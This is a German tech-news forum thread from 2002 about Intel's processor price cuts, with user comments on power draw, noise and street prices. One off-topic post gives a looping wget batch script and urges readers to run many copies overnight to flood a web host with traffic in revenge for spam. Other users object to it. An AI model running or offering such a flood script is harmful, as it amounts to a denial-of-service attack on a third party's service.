1. Foren
  2. Kommentare (alt, bis 13.1.2005)
  3. Hardware
  4. Prozessoren

Intel senkt Prozessorpreise

  1. Thema

Neues Thema Ansicht wechseln


  1. Intel senkt Prozessorpreise

    Autor: Golem.de 13.11.02 - 11:31

    Im Vorfeld der Vorstellung des neuen 3,06-GHz-Pentium-4-Prozessors mit HyperThreading hat Intel jetzt rückwirkend zum vergangenen Sonntag die Preise seiner schnellen Pentium-4- und Celeron-Chips um bis zu 27 Prozent gesenkt.

    https://www.golem.de/0211/22646.html

  2. Re: Intel senkt Prozessorpreise

    Autor: Tommy 13.11.02 - 13:30

    Stichwort Leistungsaufnahme. Die können die Preise senken soviel sie wollen - ich vermute, solange es keine CPUs mit adäquater Leistungsaufnahme (um die 25-30 Watt) auf dem Markt gibt, werden viele Leute warten, was AMDs Hammer diesbezüglich zu bieten hat. Die Geschwindigkeit dürfte ab ein 1 Ghz nicht mehr so entscheidend für den Kauf sein - ein paar 100 Mhz mehr oder weniger... Gegenstimmen?

  3. Re: Intel senkt Prozessorpreise

    Autor: Buggs Bunny 13.11.02 - 15:24

    Fragt sich immer nur, was für ein Markt du damit ansprichst.
    Es gibt auch ein paar Leute, die nur auf die Geschwindigkeit gucken und die die Lärmentwicklung nicht interessiert, wie soche Leute, die sich eine Radeon 9700 Pro kaufen! 50db Lautstärke des Lüfters ist normal!!!
    Diese Leute kaufen eben auch die schnellen Intel-Prozessoren, allerdings auch für vollkommen überteuerte Preise! Meiner Meinung nach, würde es auch mal Sinn für Hersteller wie Intel und AMD machen, niedriger getaktere Versionen anzubieten, die dann weniger Abwärme produzieren und u.U. dann sogar passiv gekühlt werden könnten. Via hat es mit dem C3 vorgemacht, allerdings ist der im FPU-Bereich viellicht auf P3-500-Niveau, was mir nun auch wieder zu wenig ist. Aber z.B. einen Athlon XP mit 1000MHZ wäre doch sehr interessant. Jetzt kommen vielleicht welche an und sagen, dann untertakte den doch. Leider sind die Prozessoren gelockt und ein FSB von 100MHZ oder ähnliches einzustellen bremst das System doch ein bißchen sehr massiv aus.

  4. netmails.com SPAMT WIE NE SAU!! (BatchUpdate)

    Autor: netmails.com 13.11.02 - 21:04

    netmails.com - SPAMT WIE SAU!!

    Helft alle mit ihnen richtig Traffic zu machen!!
    Killen werden wir sie nicht aber schliesslich bezahlt man ja auch Traffic Gebühren. Oder ihr Provider wird sich wenn sie zu viel Müll Traffic produzieren schon beschweren.

    Gibt es denn niemand der mal n Tool schreibt was volgendes Script als Bildschirmschoner laufen lässt? Ich lass es immer die Nacht über in etwa 40 Instanzen laufen macht pro Stunde so 300 MB Traffic.

    Das script ist nur Hilfe zur Selbsthilfe. Bekomme ja auch jeden Tag X- Mails von denen. Filter kann man nicht setzen da sie Absender und Empfänger so krass Faken das es keine Möglichkeit gibt.

    Also helft alle mit!!!

    unter www.google.de einfach wget.exe runter laden und los gehts!


    --- Batch startet hier (loop.bat) ----
    :loop

    wget --header="User-Agent: we do not tolerate spam" --proxy=off --output-document=dialer.vorsicht --delete-after http://www.netmails.com/members/duio/Hardcore-Shows.exe

    wget --header="User-Agent: we do not tolerate spam" --proxy=off --output-document=dialer.vorsicht --delete-after http://www.netmails.com/members/ichsuche2/zugangvs.exe

    wget --header="User-Agent: we do not tolerate spam" --proxy=off --output-document=dialer.vorsicht --delete-after http://www.netmails.com/members/suchedich/zugangvs.exe

    wget --header="User-Agent: we do not tolerate spam" --proxy=off --output-document=dialer.vorsicht --delete-after http://www.netmails.com/members/traumdate/traumdate.exe

    wget --header="User-Agent: we do not tolerate spam" --proxy=off --output-document=dialer.vorsicht --delete-after http://www.netmails.com/members/traumdating/traumdate.exe

    wget --header="User-Agent: we do not tolerate spam" --proxy=off --output-document=dialer.vorsicht --delete-after http://www.netmails.com/members/sonnentraum/privattreffen.exe

    goto loop
    --- Batch endet hier (loop.bat) ----

    Achtet auf den Zeilenumbruch.

  5. Re: netmails.com SPAMT WIE NE SAU!! (BatchUpdate)

    Autor: Sonstwer 13.11.02 - 21:23

    schön das du experte das forum hier zuspammst

  6. Re: netmails.com SPAMT WIE NE SAU!! (BatchUpdate)

    Autor: woddy 13.11.02 - 23:43

    nimm spamassassin...

    du megaspama!

    gr aus der unix welt!

    ps es gibt schleifen!

  7. Re: netmails.com SPAMT -nicht- WIE NE SAU!! (BatchUpdate)

    Autor: N8schichtler 14.11.02 - 12:06

    Netmails.com kann dafür nichts. Die bieten lediglich einen Free-Webspace-Dienst an, der dann von den Spammern genutzt wird. Schick deine Spams einfach an abuse@netmails.com. Die kümmern sich um den Rest und schließen die Accounts.

    Am Besten schickst Du auch noch eine Mail an der Einwahl-Provider des Spammers. Das wirkt Wunder!

    Gruß
    N8schichtler

  8. Re: netmails.com SPAMT WIE NE SAU!! (BatchUpdate)

    Autor: Schwanzus Reichlich Longus 14.11.02 - 12:10

    spam is goil. you'll never get us

  9. Re: Intel senkt Prozessorpreise

    Autor: Larry 14.11.02 - 12:56

    Wäre mal interessant zu wissen, wie lange es dauert bis der Endverbraucher von der Preissenkung profitieren kann und wie ein geschätzter Preisvergleich ALT/NEU für den Endverbraucher aussehen könnte.

  10. Re: Intel senkt Prozessorpreise

    Autor: JI (golem.de) 14.11.02 - 13:04

    Hallo,

    einen Eindruck wie die Preissenkung sich im Markt auswirkt bietet unser Preisvergleich, z.B. unter http://markt.golem.de/5-476e2.html. Wie zu sehen ist sanken die Preise für den 2,8 GHz Pentium 4 in den letzten zwei Wochen von rund 650 auf unter 550 Euro - der Markt hat die offizielle Preissenkung also offenbar vorweggenommen.

    ...jens

  11. Re: Intel senkt Prozessorpreise

    Autor: Kai Klindworth 14.11.02 - 16:15

    Yo! Mir kommt diese Preissenkung recht. Am meisten wurde ja der 1,4 GHz Celeron gesenkt. Und dieser hat eine Leistungsaufnahmen von ca. 32 Watt. Also dreimal dürft ihr raten, was ich in Kürze kaufen werde

  12. Re: Intel senkt Prozessorpreise

    Autor: Larry 14.11.02 - 19:03

    N'Abend,

    danke für den Link.

    Nur schade, das INTEL ausgerechnet die 2,4 und 2,53er von der Preissenkung ausgeschlossen hat.

    Ich warte extra seit 10 Tagen in der Hoffnung, den 2,53 zum Preis des 2,4er durch die Preissenkung zu bekommen.

    Kann sich da kurzfristig noch was tun?
    Wie ist die Einschätzung?

    Danke für die Antwort.

    Bey
    Larry

  1. Thema

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. über experteer GmbH, Frankfurt (Oder) (Home-Office)
  2. über experteer GmbH, Karlsruhe
  3. Schneider GmbH & Co. KG, Fronhausen
  4. ALDI International Services GmbH & Co. oHG, Mülheim an der Ruhr

Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Hardware-Angebote
  1. täglich neue Deals bei Alternate.de
  2. (reduzierte Überstände, Restposten & Co.)


Haben wir etwas übersehen?

E-Mail an news@golem.de


Serien & Filme: Star Wars - worauf wir uns freuen können
Serien & Filme
Star Wars - worauf wir uns freuen können

Lange sah es so aus, als liege die Zukunft von Star Wars überwiegend im Kino. Seit dem Debüt von Disney+ und dem teils schlechten Abschneiden der neuen Filme hat sich das geändert.
Von Peter Osteried

  1. Star Wars Disney und Lego legen Star Wars Holiday Special neu auf
  2. Star Wars Squadrons im Test Die helle und dunkle Seite der Macht
  3. Disney+ Erster Staffel-2-Trailer von The Mandalorian ist da

Star Trek Discovery: Harte Landung im 32. Jahrhundert
Star Trek Discovery
Harte Landung im 32. Jahrhundert

Die dritte Staffel von Star Trek: Discovery nutzt das offene Ende der Vorgängerstaffel. Sie verspricht Spannung - etwas weniger Pathos dürfte es aber sein.
Eine Rezension von Tobias Költzsch

  1. Star Trek Prodigy Captain Janeway spielt in Star-Trek-Cartoonserie mit
  2. Paramount Zukunft für Star-Trek-Filme ist ungewiss
  3. Streaming Star Trek Discovery kommt am 15. Oktober zurück

Apple: iPhone 12 bekommt Magnetrücken und kleinen Bruder
Apple
iPhone 12 bekommt Magnetrücken und kleinen Bruder

Das iPhone 12 ist mit einem 6,1-Zoll- und das iPhone 12 Mini mit einem 5,4-Zoll-Display ausgerüstet. Ladegerät und Kopfhörer fallen aus Gründen des Umweltschutzes weg.

  1. Apple iPhone 12 Pro und iPhone 12 Pro Max werden größer
  2. Apple iPhone 12 verspätet sich
  3. Back Tap iOS 14 erkennt Trommeln auf der iPhone-Rückseite